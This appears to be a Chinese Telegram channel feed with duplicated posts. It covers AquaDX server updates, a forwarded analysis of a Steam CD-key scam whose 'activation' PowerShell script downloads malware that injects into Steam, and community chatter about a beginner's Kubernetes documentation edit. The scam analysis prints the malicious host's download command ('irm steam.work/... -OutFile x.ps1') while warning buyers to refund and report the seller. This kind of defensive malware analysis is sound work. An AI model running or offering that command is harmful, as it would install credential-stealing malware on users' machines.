给 AquaDX 适配了 145 的喜爱收藏品和喜欢的歌
亲密度和 maimile 还没做,毕竟现在还没有支持能获取 maimile 的渠道
亲密度和 maimile 还没做,毕竟现在还没有支持能获取 maimile 的渠道
❤7
https://github.com/hykilpikonna/AquaDX/commit/a71c2bd8ec29be59226af7c6de19227abccf6f70
AquaDX 现已支持导入 Aqua 导出的数据
AquaDX 现已支持导入 Aqua 导出的数据
🥰4
Forwarded from 橘橘橘子汁 & 🍊
# 关于 steam.work 激活码诈骗脚本的分析
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是
那么真实的代码就只剩一行了
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是
<!DOCTYPE html> 这鸟人给他改成 <#!DOCTYPE html> 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损那么真实的代码就只剩一行了
irm steam.work/pwsDwFile/new1 -OutFile x.ps1
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
👍7
Forwarded from 帆室邻
🤔7
Forwarded from 黑客少女的日常 THG's Official Ch. (赛小盐 Cyan - VTuber)
听林小姐说中文技术圈有瓜吃
居然是因为一个初学cs的小姐姐在k8s文档上加了换行,发了开心的post,然后评论区就炸了。
而在此之前,她默默自学了云原生和Vim,还记了笔记。
她本职是英文编辑,我想自然可以对排版提意见。
我希望她继续加油,也希望我们的社区善待新人,就像善待当初跌跌撞撞的自己
https://fixupx.com/cyanvtb/status/1822159777285144873
居然是因为一个初学cs的小姐姐在k8s文档上加了换行,发了开心的post,然后评论区就炸了。
而在此之前,她默默自学了云原生和Vim,还记了笔记。
她本职是英文编辑,我想自然可以对排版提意见。
我希望她继续加油,也希望我们的社区善待新人,就像善待当初跌跌撞撞的自己
https://fixupx.com/cyanvtb/status/1822159777285144873
FxTwitter / FixupX
Cyan是小鹽🧂✨ / 90k訂閱衝刺中 (@cyanvtb)
听林小姐说中文技术圈有瓜吃
居然是因为一个初学cs的小姐姐在k8s文档上加了换行,发了开心的post,然后评论区就炸了。
而在此之前,她默默自学了云原生和Vim,还记了笔记。
她本职是英文编辑,我想自然可以对排版提意见。
我希望她继续加油,也希望我们的社区善待新人,就像善待当初跌跌撞撞的自己
居然是因为一个初学cs的小姐姐在k8s文档上加了换行,发了开心的post,然后评论区就炸了。
而在此之前,她默默自学了云原生和Vim,还记了笔记。
她本职是英文编辑,我想自然可以对排版提意见。
我希望她继续加油,也希望我们的社区善待新人,就像善待当初跌跌撞撞的自己
❤4🤔1
黑客少女的日常 THG's Official Ch.
听林小姐说中文技术圈有瓜吃 居然是因为一个初学cs的小姐姐在k8s文档上加了换行,发了开心的post,然后评论区就炸了。 而在此之前,她默默自学了云原生和Vim,还记了笔记。 她本职是英文编辑,我想自然可以对排版提意见。 我希望她继续加油,也希望我们的社区善待新人,就像善待当初跌跌撞撞的自己 https://fixupx.com/cyanvtb/status/1822159777285144873
看了一下相关的事情,我认为这件事是发小红书导致的。要是没有发小红书,贡献一个空格完全不会有什么问题
都已经决定学计算机了,就应该把小红书这样的垃圾平台卸载,影响智力
https://github.com/cyy8/notes/issues/2#issuecomment-2277410074
都已经决定学计算机了,就应该把小红书这样的垃圾平台卸载,影响智力
https://github.com/cyy8/notes/issues/2#issuecomment-2277410074
😁10👍3🤓1